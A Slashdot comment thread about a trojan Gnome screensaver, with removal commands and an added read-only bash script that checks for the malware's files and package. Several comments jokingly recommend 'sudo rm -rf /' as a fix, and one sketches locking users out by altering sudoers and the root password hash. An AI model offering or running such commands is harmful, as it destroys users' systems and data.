Xerp (768138) | more than 4 years ago | (#30382266)

"sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552" Man. I'm going to have to get me some anti-malware software...
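A read-only check for the files and package named in the removal command above, so you can see what is actually present before deleting anything as root. This is an added example, not part of the original comment or of the sites' instructions; the function names, the root-prefix argument and the constructed sample tree are assumptions, and the two relative names in the command (index.php, run.bash) are skipped because they depend on the directory the command is run from.

```bash
#!/usr/bin/env bash
# Added example, not from the original thread. The three absolute paths and the
# package name app5552 come from the removal command quoted above; everything
# else (function names, root prefix, sample tree) is an assumption of this sketch.

ARTIFACTS="/usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh"
PACKAGE="app5552"

# List every named artifact that exists under ROOT (empty ROOT = live system).
find_artifacts() {
    local root="${1:-}" path
    for path in $ARTIFACTS; do
        if [ -e "${root}${path}" ] || [ -L "${root}${path}" ]; then
            printf '%s\n' "$path"
        fi
    done
}

# Print the dpkg state of PACKAGE as recorded in a dpkg status file.
package_state() {
    local status_file="${1:-/var/lib/dpkg/status}"
    if [ ! -r "$status_file" ]; then
        echo "unknown"
        return 0
    fi
    awk -v pkg="$PACKAGE" '
        $1 == "Package:" { current = $2 }
        $1 == "Status:" && current == pkg { state = $4 }
        END { print (state == "" ? "not-installed" : state) }
    ' "$status_file"
}

# Summarise findings; exit status 1 means something from the list is present.
check_system() {
    local root="${1:-}" found state
    found="$(find_artifacts "$root")"
    state="$(package_state "${root}/var/lib/dpkg/status")"
    if [ -n "$found" ]; then
        printf 'present: %s\n' $found
    fi
    echo "package $PACKAGE: $state"
    case "$state" in
        not-installed|config-files|unknown) ;;
        *) return 1 ;;
    esac
    [ -z "$found" ]
}

# Demonstration on a constructed directory tree, not on the live system.
demo() {
    local tmp
    tmp="$(mktemp -d)"
    mkdir -p "$tmp/usr/bin" "$tmp/etc/profile.d" "$tmp/var/lib/dpkg"
    : > "$tmp/usr/bin/run.bash"
    : > "$tmp/etc/profile.d/gnome.sh"
    printf 'Package: app5552\nStatus: install ok installed\n\n' \
        > "$tmp/var/lib/dpkg/status"
    check_system "$tmp" || echo "-> review these before removing anything"
    rm -rf "$tmp"
}
demo
```

Calling `check_system` with no argument inspects the running system; nothing is modified in either case.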

The Elegance of Programming (-1, Flamebait)

Anonymous Coward | more than 4 years ago | (#30382370)

"sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552"

There is an easier (read: more elegant) way to get rid of this Linux malware:

sudo rm -rf /

Re:The Elegance of Programming (3, Funny)

sexconker (1179573) | more than 4 years ago | (#30382684)

There is an easier (read: more elegant) way to get rid of this Linux malware:

sudo rm -rf /

Pussies.
rm -rf /
works fine for me!

Re:Removal instructions from the site (4, Insightful)

wizardforce (1005805) | more than 4 years ago | (#30382426)

This makes me wonder how long it will be before some warning about a fake virus/trojan/worm succeeds in convincing a few Linux newbies to run some command to get rid of the fake malware which inevitably causes damage or actually downloads actual malware. Something along the lines of: "if you've been infected with virus.deb just run the following command: sudo rm -rf / usr/bin/virus" The only cure is education.

Re:Removal instructions from the site (1)

wizardforce (1005805) | more than 4 years ago | (#30382530)

That malware was such a simple script... It could have done boat loads more damage than it did. Lock out the user from sudo by changing the sudoers file, replacing the password hash for root. In that case just about the only thing that you can do is grab a live cd and fix the problem...

Re:Removal instructions from the site (0)

Anonymous Coward | more than 4 years ago | (#30382662)

That's missing the point though. They don't WANT people to realise the machine is compromised. Kinda like Ebola....it's so hostile to the host it tends to largely self-contain.

Re:Removal instructions from the site (4, Insightful)

selven (1556643) | more than 4 years ago | (#30382676)

A confusing command line instruction which most people would Ctrl-C and Ctrl-Shift-V into their terminal is actually a pretty good way to get a virus onto a Linux newbie's computer.

Repositories! (1)

h4rr4r (612664) | more than 4 years ago | (#30382338)

This is why you only install packages from the repositories.

Re:Repositories! (-1, Flamebait)

sopssa (1498795) | more than 4 years ago | (#30382398)

And that is why there will never be the year of the linux on desktop.

Re:Repositories! (4, Insightful)

binarylarry (1338699) | more than 4 years ago | (#30382468)

Why? Because it's a sane method of delivering software, which is becoming widely used (i.e. Steam, iTunes Store, etc) vs the traditional "Herpes" model used by Windows?

Re:Repositories! (3, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382510)

Well do you really want the iPhone like only-approved-software app store for your computer? With no way to download software from anywhere else than that said approved app store.

Re:Repositories! (4, Informative)

wizardforce (1005805) | more than 4 years ago | (#30382642)

No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.

Re:Repositories! (0)

Anonymous Coward | more than 4 years ago | (#30382688)

Yes, for typical users absolutely...
People should have to jump through hoops to install arbitrary untrusted software, so that only technically competent people will ever try to do so.

Re:Repositories! (1)

selven (1556643) | more than 4 years ago | (#30382708)

You can always download software from elsewhere. Also, the Ubuntu repositories really aren't like the iPhone App Store - the approval process isn't nearly as evil, for one.

Okay (0)

Anonymous Coward | more than 4 years ago | (#30382354)

So a user runs untrusted software as root and gets malware. Never heard of this happening.

auto-update (3, Insightful)

TheSHAD0W (258774) | more than 4 years ago | (#30382404)

Okay, this scares me.

1. What happens when a publisher includes auto-updating code, but not specific attack code, like the DDoS software in the mentioned examples? If discovered it will appear to be a security risk, but not specifically malicious...

2. What happens when a software developer produces some completely innocuous software, gets into the repositories - and then months down the road, produces an update with DDoS capability, and has the update pushed into the repositories and automatically distributed?

Re:auto-update (1, Offtopic)

Aim Here (765712) | more than 4 years ago | (#30382518)

You're describing Microsoft Windows XP.

XP came with an automatic update function. A few years into XP's life, Windows Genuine Advantage was automatically rolled out in a service pack, and once installed it will degrade your computer if Microsoft decides you might be a pirate.

Your nightmare scenario is everyday reality for most people. Pleasant dreams.

scare the crap out of me (1)

qbasicjedi (1247790) | more than 4 years ago | (#30382428)

I swear to god, not thirty seconds before I came to slashdot and saw this story, I closed the gnome-look.com tab and had just finished pimpin' out my Gnome desktop. Good thing I didn't download any screensavers...

Whoop dee doo (1)

Dega704 (1454673) | more than 4 years ago | (#30382436)

Like Windows or any operating system, Linux is only as secure as the user keeps it. In a way this is sort of a win because it means Linux is now popular enough for the malware makers to pay attention to it, and it will motivate the Linux community to be more vigilant. Welcome to the mainstream and everything that comes with it. This highlights the advantage of using software repositories as well...

At least it was fixable. (2, Insightful)

supersloshy (1273442) | more than 4 years ago | (#30382450)

Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this. On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware. I am glad to use an OS that doesn't restrict me like that. :)

Re:At least it was fixable. (5, Insightful)

PeanutButterBreath (1224570) | more than 4 years ago | (#30382600)

Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this.

Before trolls start yelling about how "OMGZ WINDOZE AV SOFTWARE IS COMPLICATED HAHAHA" and things like that, let me tell you something: because Windows is so accessible, AV software like this can be very easily deployed. All you have to do is click a few icons in the Start Menu to remove this. Blah, blah, blah

On Linux and the like, everything is simple if you already know what you want to do. Otherwise, you have to trust unaccountable internet entities to provide you abstruse commands to run and hope they aren't trying to trick you into doing even more damage to your system. It should be obvious why that is no way to combat malware.

What the summary didn't mention... (5, Informative)

AlgorithMan (937244) | more than 4 years ago | (#30382502)

What the summary didn't mention: the screensaver has been there less than 24 hours.
See pro-linux.de [pro-linux.de] (German)

Patch news... (2, Funny)

ghostis (165022) | more than 4 years ago | (#30382516)

The Gnome team is working with several university neurology departments to develop a patch for human nature that fixes this problem. It will be included in Gnome 4.

old chinese proverb (0)

Anonymous Coward | more than 4 years ago | (#30382536)

You can't patch stupid!

O/S Permissions Model Broken - try plash (1)

_greg (130136) | more than 4 years ago | (#30382658)

The idea that software that I have no opportunity to audit runs with my privileges when I run it is fundamentally broken. There is no way to clean malware that had a network connection long enough to hide a trojan anywhere and then overwrite itself to appear relatively innocuous. While a complete redesign of the way permissions and permission-delegation work would be ideal, it is not practical in the short term. Using systems like http://plash.beasts.org/ [beasts.org] can help.

Fine-grained privileges (1)

noidentity (188756) | more than 4 years ago | (#30382616)

I want a mainstream OS that allows fine-grained privileges for programs. Why should I have to give my screensaver permission to do anything except display graphics, and perhaps read some data files from its own directory?

Why can't we call it what it is... (1)

mysidia (191772) | more than 4 years ago | (#30382724)

It's a Trojan Horse

Malware is a generic term for malicious software.

But the notion of Trojan applies here; you download a seemingly innocent program, but it contains a hidden nefarious payload.

AV software makers love it, because it means that once software gets classified as Malware instead of an actual virus, they don't have to worry about detection and safe removal anymore, that's another program's job...
